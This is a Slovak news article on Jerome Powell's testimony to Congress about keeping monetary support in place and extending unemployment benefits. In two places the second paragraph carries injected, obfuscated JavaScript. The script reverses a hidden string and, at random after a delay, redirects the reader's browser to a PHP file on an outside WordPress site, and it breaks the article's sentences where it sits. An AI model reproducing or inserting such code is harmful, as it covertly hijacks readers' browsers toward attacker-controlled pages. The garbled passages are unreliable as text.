USA, Amerika, Spojené štáty

Musíme držať nohu na plyne, apeloval v americkom Kongrese šéf Fedu

Americké hospodárstvo sa pomaly začína zotavovať z toho najhoršieho. Samozrejme, dvadsaťpäť miliónov nezamestnaných a neustupujúca epidémia koronavírusu si žiada viac našu pomoc, povedal kongresmanom guvernér Federálneho rezervného systému Jerome Powell.

Podľa šéfa $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domu/“>americkej centrálnej banky je nevyhnutné, aby $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodrziavanim-protiepidemickych-opatreni/“>Fed držal nohu na plyne, kým si ľudia v jeho vedení nebudú istí, že to už nie je nutné. „Myslím, že aj vy zistíte, že môžete urobiť viac,“ povedal Jerome Powell vo svojej stredajšej reči v Snemovni reprezentantov amerického Kongresu.

Cesta z recesie nejakú dobu potrvá. Podľa Powella úrokové sadzby budú musieť zostať blízko nule po oveľa dlhší časový úsek, než bolo doteraz zvykom. Powell tiež uistil, že Fed bude pokračovať v nákupe dlhopisov, aby zabezpečil, že zdroje na financovanie investičných a vládnych výdavkov budú lacné, kým to bude potrebné.

Jerome Powell však pripomenul, že zákonodarcovia budú musieť takisto pridať ruku k dielu, aby sa hospodárstvo spamätalo čo najskôr. Apeloval okrem iného na to, aby Kongres predĺžil výplatu mimoriadnych dávok v nezamestnanosti vo výške 600 dolárov týždenne, ktoré majú aktuálne skončiť v júli. Taktiež zdôraznil, že pomôcť budú potrebovať aj malé firmy a podnikatelia.

Jeden komentář

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *